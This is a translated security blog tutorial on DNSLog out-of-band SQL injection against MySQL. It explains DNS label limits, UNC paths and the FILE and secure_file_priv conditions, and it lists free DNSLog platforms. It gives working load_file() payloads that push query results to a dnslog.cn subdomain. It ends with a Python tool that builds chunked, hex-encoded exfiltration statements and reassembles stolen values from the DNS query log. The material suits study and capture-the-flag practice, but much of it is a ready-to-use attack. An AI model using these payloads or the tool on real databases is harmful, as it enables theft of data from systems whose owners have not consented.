Dnslog injection
2022-06-28 18:00:00 【errorr0】
This is not a separate vulnerability so much as a way of using SQL injection: the load_file() function is made to open a UNC path whose host name contains the query result, the database server resolves that host name through DNS, and the DNS query carries the data out.
Domain name resolution
Domain names need no introduction; anyone who knows a little about computers has heard of them and has some idea of what DNS resolution is. In short, resolving a domain name means asking DNS servers for the IP address that belongs to it, and the lookup works through the name hierarchy one level at a time.

A domain name is a sequence of labels separated by dots and is read from right to left: the rightmost label is the top level, and each label to its left is one level lower. A lower-level name is resolved by the name servers responsible for the level above it. So if one domain is zc1t6a.dnslog.cn and another is database.zc1t6a.dnslog.cn, the second is resolved by asking the servers for the first, and those servers see the complete name in the query. Whoever controls zc1t6a.dnslog.cn therefore sees the label database in their query log, which is how data can be carried out indirectly.
Each label of a domain name may be at most 63 characters (and the whole name at most 253). When the value taken from MySQL is longer than 63 characters, the resulting host name is invalid, no lookup is sent at all, and zc1t6a.dnslog.cn records nothing, so the data never arrives. Values longer than 63 characters must therefore be read in pieces with substring().

One more rule: a host name label may contain only letters, digits and hyphens (underscores are tolerated by many resolvers, but that is about it). If the extracted value contains other characters, such as spaces, @ or punctuation, load_file() is handed an invalid host name and nothing goes out on the network. There are always ways around this: replace() can swap the offending characters for allowed ones and they can be swapped back afterwards, or hex() can encode the whole value so that only 0-9 and A-F ever appear in the label.
UNC paths
Before looking at UNC paths, look at a DNSLog injection payload:
select load_file(concat('\\\\',(select database()),'.jtc581.dnslog.cn/abc'));
The part of this payload people usually ask about is the first argument to concat(), '\\\\'. What happens if it is replaced with something else? Try it yourself: with anything else the DNS lookup never happens and no data comes out. The reason is the format of a UNC path, which is what load_file() needs in order to read a remote file.
UNC (Universal Naming Convention), also translated as the general naming rule or universal naming convention, is the complete naming scheme for resources on Windows networks (mostly LANs).
1. A UNC path is a network path of the form \\softer, that is, a name preceded by two backslashes.
2. Format: \\servername\sharename, where servername is the server name and sharename is the name of the shared resource.
The UNC name of a directory or file can include a directory path below the share name, in the form \\servername\sharename\directory\filename.
A UNC share is a shared network disk. The shared folder named it168 on the computer softer is written in UNC form as \\softer\it168; the default administrative share C$ on the same computer is written \\softer\c$.
The command-line access used to reach Network Neighborhood is, properly speaking, UNC path access.
(The UNC explanation above comes from Baidu Encyclopedia.)
Since the UNC format starts with two backslashes, why does the payload use four? Because the backslash is the escape character inside a MySQL string literal: each pair \\ in the literal is one actual backslash, so '\\\\' yields exactly the two backslashes the UNC path needs.
Conditions for using DNSLog
DNSLog injection relies on load_file(), so permission to use load_file() is essential. It requires the FILE privilege (in practice a root account) and a suitable secure_file_priv setting. One more condition that is easy to overlook: UNC paths are opened by the Windows SMB client, so this only works when MySQL is running on Windows; on Linux load_file('\\\\...') simply returns NULL and no DNS query is ever made. Check the setting with show variables like "%secure%"; the possible values mean the following:
1. When secure_file_priv is empty, there is no restriction and files anywhere on the disk can be read.
2. When secure_file_priv is a directory such as /, only files under that directory can be read.
3. When secure_file_priv is NULL, load_file cannot load any file.

If it is NULL, change it as follows (secure_file_priv is read-only at runtime, so MySQL must be restarted afterwards):
windows: edit my.ini and add secure_file_priv = '' under [mysqld]
linux: edit my.cnf and add secure_file_priv = '' under [mysqld]
These are the same conditions that apply to into outfile and into dumpfile.
As explained above, DNS resolution means that a lower-level name is resolved by the level above it, so to see the queries you need to control a domain. Buying a domain just to practise would be a nuisance. Fortunately, several platforms provide a free temporary domain for DNSLog testing (very generous of them):
http://www.dnslog.cn
http://admin.dnslog.link
http://ceye.io
I personally prefer the first one, mainly because it is the most convenient.
DNSLog injection test
A simple test: find the database name, the table names, the column names and finally the data in the columns, all through DNSLog.

The load_file() statement used:
select load_file(concat('\\\\',(select database()),'.xiw0zu.dnslog.cn/abc'));

Enumerating the database, tables, columns and fields follows the usual information_schema queries, just written in the form shown above, with substring() or replace() applied whenever the value would not fit in a valid host name.

The same applies to CTF challenges: once the injection point has been closed off properly and load_file() is available, DNSLog injection is ready to use.
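The label-length and character-set limits described above and the step-by-step enumeration just shown are easiest to handle with a small helper. The script below is an added example, not code from the original post: it generates the MySQL load_file() statements (hex-encoded, cut into chunks with SUBSTRING() and tagged with a p1, p2, ... index label so the order is known) and reassembles the value from the names that show up on the DNSLog panel. The dnslog.cn subdomain, the p&lt;n&gt; and len index labels and the sample query names are assumptions and constructed data; as noted above, the statements only produce a DNS query when MySQL runs on Windows.

```python
"""DNSLog exfiltration helper for MySQL LOAD_FILE() (added example, not the
original post's code).  The dnslog subdomain, the 'p<n>' / 'len' index labels
and all sample data below are assumptions made for the example."""
import re
from typing import Dict, List

LABEL_MAX = 63   # one DNS label may hold at most 63 characters
NAME_MAX = 253   # a whole name, dots included, may hold at most 253

# The MySQL literal '\\\\' unescapes to the two backslashes of a UNC path.
UNC_PREFIX = r"'\\\\"


def length_payload(subquery: str, dnslog_domain: str) -> str:
    """First statement: learn the length of the value so the chunk count is known."""
    return (f"SELECT LOAD_FILE(CONCAT({UNC_PREFIX}len.',LENGTH(({subquery})),"
            f"'.{dnslog_domain}/abc'));")


def build_payloads(subquery: str, dnslog_domain: str, result_len: int,
                   chunk: int = 60) -> List[str]:
    """One SELECT LOAD_FILE() statement per chunk of the hex-encoded result.

    HEX() keeps each label to 0-9A-F, so spaces, '@' or '.' in the data cannot
    produce an invalid host name; SUBSTRING() cuts the hex into pieces of at
    most `chunk` (<= 63) characters; a leading 'p<n>' label records the chunk
    order for the decoder.  `result_len` is the length in bytes of the value
    being read (two hex characters per byte).  With a short dnslog domain the
    whole name stays well under NAME_MAX.
    """
    if not 0 < chunk <= LABEL_MAX:
        raise ValueError("chunk must be between 1 and 63")
    payloads = []
    hex_len = result_len * 2
    for n, offset in enumerate(range(1, hex_len + 1, chunk), start=1):
        label = f"SUBSTRING(HEX(({subquery})),{offset},{chunk})"
        name = f"CONCAT({UNC_PREFIX}p{n}.',{label},'.{dnslog_domain}/abc')"
        payloads.append(f"SELECT LOAD_FILE({name});")
    return payloads


_QUERY_RE = re.compile(r"^p(\d+)\.([0-9a-f]+)$")


def decode_queries(queries: List[str], dnslog_domain: str) -> bytes:
    """Reassemble the value from the query names seen on the DNSLog panel.

    Names may arrive in any order, may repeat (resolver retries) and may carry
    a trailing dot; anything not under `dnslog_domain` is ignored.  A missing
    chunk is reported instead of silently producing a truncated value.
    """
    suffix = "." + dnslog_domain.lower()
    chunks: Dict[int, str] = {}
    for q in queries:
        name = q.strip().rstrip(".").lower()
        if not name.endswith(suffix):
            continue
        m = _QUERY_RE.match(name[:-len(suffix)])
        if m:
            chunks[int(m.group(1))] = m.group(2)
    if not chunks:
        raise ValueError("no matching queries under " + dnslog_domain)
    missing = sorted(set(range(1, max(chunks) + 1)) - set(chunks))
    if missing:
        raise ValueError(f"missing chunks: {missing}")
    return bytes.fromhex("".join(chunks[i] for i in sorted(chunks)))


if __name__ == "__main__":
    domain = "xiw0zu.dnslog.cn"   # assumed temporary domain from the panel
    tables = ("select group_concat(table_name) from information_schema.tables "
              "where table_schema=database()")
    print(length_payload(tables, domain))
    for stmt in build_payloads(tables, domain, result_len=31):
        print(stmt)
    # Constructed sample of what the panel would then show for a 31-byte result.
    secret = b"users,orders,sessions,audit_log"
    h = secret.hex().upper()
    captured = [f"p2.{h[60:]}.{domain}.", "unrelated.example.com",
                f"p1.{h[:60]}.{domain}"]
    print(decode_queries(captured, domain).decode())
```

The chunk size defaults to 60 rather than 63 so the hex stays an even number of characters and whole bytes land in each label; the decoder lowercases names because DNS is case-insensitive and panels differ in what they display.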
References:
UNC paths - weixin_33924312's blog, CSDN
UNC path - Baidu Encyclopedia
Domain name resolution - Soy sauce's blog, CSDN (domain name resolution rules)
DNSLog injection - Two ladies' post-it notes blog, CSDN
【Old matches strike new sparks】 DNSLog: efficient penetration without echo - affectionately
Detailed analysis of DNSLog injection - FreeBuf network security portal